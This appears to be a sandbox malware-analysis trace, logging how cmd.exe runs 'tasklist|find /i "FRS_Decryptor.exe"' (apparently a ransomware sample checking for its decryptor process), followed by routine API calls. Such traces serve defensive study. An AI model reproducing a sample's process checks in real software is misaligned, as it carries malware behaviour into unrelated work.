"C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3140 start_va = 0xdb0000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 3141 start_va = 0xdd0000 end_va = 0xdd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 3142 start_va = 0xde0000 end_va = 0xdeefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 3143 start_va = 0xdf0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 3144 start_va = 0xe30000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 3145 start_va = 0xf30000 end_va = 0xf33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 3146 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 3147 start_va = 0xf50000 end_va = 0xf51fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 3148 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3149 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3150 start_va = 0x7f790000 end_va = 0x7f7b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f790000" filename = "" Region: id = 3151 start_va = 0x7f7b3000 end_va = 0x7f7b3fff entry_point = 0x0 region_type = private name = "private_0x000000007f7b3000" filename = "" Region: id = 3152 start_va = 0x7f7ba000 end_va = 0x7f7bafff entry_point = 0x0 region_type = private name = "private_0x000000007f7ba000" filename = "" Region: id = 3153 start_va = 0x7f7bd000 end_va = 0x7f7bffff entry_point = 0x0 region_type = private name = "private_0x000000007f7bd000" filename = "" Region: id = 3154 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3155 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3156 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3157 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3158 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 3159 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3160 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3161 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3162 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 3163 start_va = 0xf60000 end_va = 0xfddfff entry_point = 0xf60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3164 start_va = 0x10e0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 3165 start_va = 0x1470000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 3166 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3167 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3168 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3169 start_va = 0x7f690000 end_va = 0x7f78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f690000" filename = "" Region: id = 3170 start_va = 0xdc0000 end_va = 0xdc3fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 3171 start_va = 0x1570000 end_va = 0x1844fff entry_point = 0x1570000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3190 start_va = 0xdd0000 end_va = 0xdd3fff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Thread: id = 190 os_tid = 0xb64 [0078.010] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0078.010] __set_app_type (_Type=0x1) [0078.010] __p__fmode () returned 0x76ea1768 [0078.010] __p__commode () returned 0x76ea176c [0078.010] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0078.010] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0078.010] GetCurrentThreadId () returned 0xb64 [0078.010] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb64) returned 0x34 [0078.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0078.011] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0078.011] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.012] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2f948 | out: phkResult=0xf2f948*=0x0) returned 0x2 [0078.012] VirtualQuery (in: lpAddress=0xf2f957, lpBuffer=0xf2f8f0, dwLength=0x1c | out: lpBuffer=0xf2f8f0*(BaseAddress=0xf2f000, AllocationBase=0xe30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.012] VirtualQuery (in: lpAddress=0xe30000, lpBuffer=0xf2f8f0, dwLength=0x1c | out: lpBuffer=0xf2f8f0*(BaseAddress=0xe30000, AllocationBase=0xe30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0078.012] VirtualQuery (in: lpAddress=0xe31000, lpBuffer=0xf2f8f0, dwLength=0x1c | out: lpBuffer=0xf2f8f0*(BaseAddress=0xe31000, AllocationBase=0xe30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0078.012] VirtualQuery (in: lpAddress=0xe33000, lpBuffer=0xf2f8f0, dwLength=0x1c | out: lpBuffer=0xf2f8f0*(BaseAddress=0xe33000, AllocationBase=0xe30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.012] VirtualQuery (in: lpAddress=0xf30000, lpBuffer=0xf2f8f0, dwLength=0x1c | out: lpBuffer=0xf2f8f0*(BaseAddress=0xf30000, AllocationBase=0xf30000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0078.012] GetConsoleOutputCP () returned 0x1b5 [0078.013] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0078.013] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0078.013] _get_osfhandle (_FileHandle=1) returned 0x254 [0078.013] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0078.013] _get_osfhandle (_FileHandle=1) returned 0x254 [0078.013] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0078.013] _get_osfhandle (_FileHandle=0) returned 0x24 [0078.013] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0078.013] GetEnvironmentStringsW () returned 0x14740c0* [0078.013] FreeEnvironmentStringsA (penv="=") returned 1 [0078.013] GetEnvironmentStringsW () returned 0x14740c0* [0078.013] FreeEnvironmentStringsA (penv="=") returned 1 [0078.013] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf2e898 | out: phkResult=0xf2e898*=0x44) returned 0x0 [0078.013] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x0, lpData=0xf2e8a4*=0xfc, lpcbData=0xf2e89c*=0x1000) returned 0x2 [0078.013] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x1, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.013] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x0, lpData=0xf2e8a4*=0x1, lpcbData=0xf2e89c*=0x1000) returned 0x2 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x0, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x40, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x40, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x0, lpData=0xf2e8a4*=0x40, lpcbData=0xf2e89c*=0x1000) returned 0x2 [0078.014] RegCloseKey (hKey=0x44) returned 0x0 [0078.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf2e898 | out: phkResult=0xf2e898*=0x44) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x0, lpData=0xf2e8a4*=0x40, lpcbData=0xf2e89c*=0x1000) returned 0x2 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x1, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x0, lpData=0xf2e8a4*=0x1, lpcbData=0xf2e89c*=0x1000) returned 0x2 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x0, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x9, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x4, lpData=0xf2e8a4*=0x9, lpcbData=0xf2e89c*=0x4) returned 0x0 [0078.014] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf2e8a0, lpData=0xf2e8a4, lpcbData=0xf2e89c*=0x1000 | out: lpType=0xf2e8a0*=0x0, lpData=0xf2e8a4*=0x9, lpcbData=0xf2e89c*=0x1000) returned 0x2 [0078.014] RegCloseKey (hKey=0x44) returned 0x0 [0078.014] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50079 [0078.014] srand (_Seed=0x5aa50079) [0078.014] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0078.014] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0078.014] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0078.014] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14740c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0078.014] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.014] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.014] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0078.014] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0078.014] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0078.014] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0078.014] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0078.014] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0078.014] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0078.014] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0078.014] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0078.015] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0078.015] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0078.015] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf2f678 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0078.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xf2f678, lpFilePart=0xf2f674 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf2f674*="Desktop") returned 0x1c [0078.015] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0078.015] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf2f3f0 | out: lpFindFileData=0xf2f3f0) returned 0x14742d8 [0078.015] FindClose (in: hFindFile=0x14742d8 | out: hFindFile=0x14742d8) returned 1 [0078.015] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xf2f3f0 | out: lpFindFileData=0xf2f3f0) returned 0x14742d8 [0078.015] FindClose (in: hFindFile=0x14742d8 | out: hFindFile=0x14742d8) returned 1 [0078.015] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0078.015] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xf2f3f0 | out: lpFindFileData=0xf2f3f0) returned 0x14742d8 [0078.015] FindClose (in: hFindFile=0x14742d8 | out: hFindFile=0x14742d8) returned 1 [0078.015] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0078.015] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0078.015] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0078.015] GetEnvironmentStringsW () returned 0x1476190* [0078.016] FreeEnvironmentStringsA (penv="=") returned 1 [0078.016] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0078.016] GetConsoleOutputCP () returned 0x1b5 [0078.016] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0078.016] GetUserDefaultLCID () returned 0x409 [0078.016] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0078.016] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf2f7a4, cchData=128 | out: lpLCData="0") returned 2 [0078.016] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf2f7a4, cchData=128 | out: lpLCData="0") returned 2 [0078.016] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf2f7a4, cchData=128 | out: lpLCData="1") returned 2 [0078.016] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0078.016] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0078.016] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0078.017] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0078.017] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0078.017] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0078.017] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0078.017] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0078.017] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0078.017] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0078.017] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0078.017] GetConsoleTitleW (in: lpConsoleTitle=0x1474e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0078.018] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0078.018] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0078.018] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0078.018] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0078.018] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0078.018] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0078.018] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0078.018] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0078.018] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0078.018] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0078.019] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0078.019] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0078.019] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0078.019] _wcsicmp (_String1="IF", _String2="find") returned 3 [0078.019] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0078.019] _wcsicmp (_String1="REM", _String2="find") returned 12 [0078.019] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0078.020] _pipe (in: _PtHandles=0x14751f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x14751f0) returned 0 [0078.020] _dup (_FileHandle=1) returned 5 [0078.020] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0078.020] _close (_FileHandle=4) returned 0 [0078.020] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0078.020] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0078.020] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0078.020] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0078.020] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0078.021] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0078.021] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0078.021] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0078.021] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0078.021] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0078.021] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0078.021] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0078.021] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0078.021] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0078.021] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0078.021] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0078.021] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0078.021] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0078.021] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0078.021] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0078.021] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0078.021] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0078.021] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0078.021] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0078.021] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0078.021] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0078.021] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0078.021] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0078.021] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0078.021] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0078.021] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0078.021] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0078.021] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0078.021] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0078.021] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0078.021] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0078.021] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0078.021] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0078.021] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0078.021] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0078.021] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0078.021] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0078.021] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0078.021] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0078.021] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0078.021] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0078.021] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0078.021] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0078.021] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0078.021] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0078.021] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0078.021] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0078.022] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0078.022] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0078.022] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0078.022] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0078.022] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0078.022] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0078.022] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0078.022] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0078.022] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0078.022] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0078.022] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0078.022] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0078.022] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0078.022] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0078.022] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 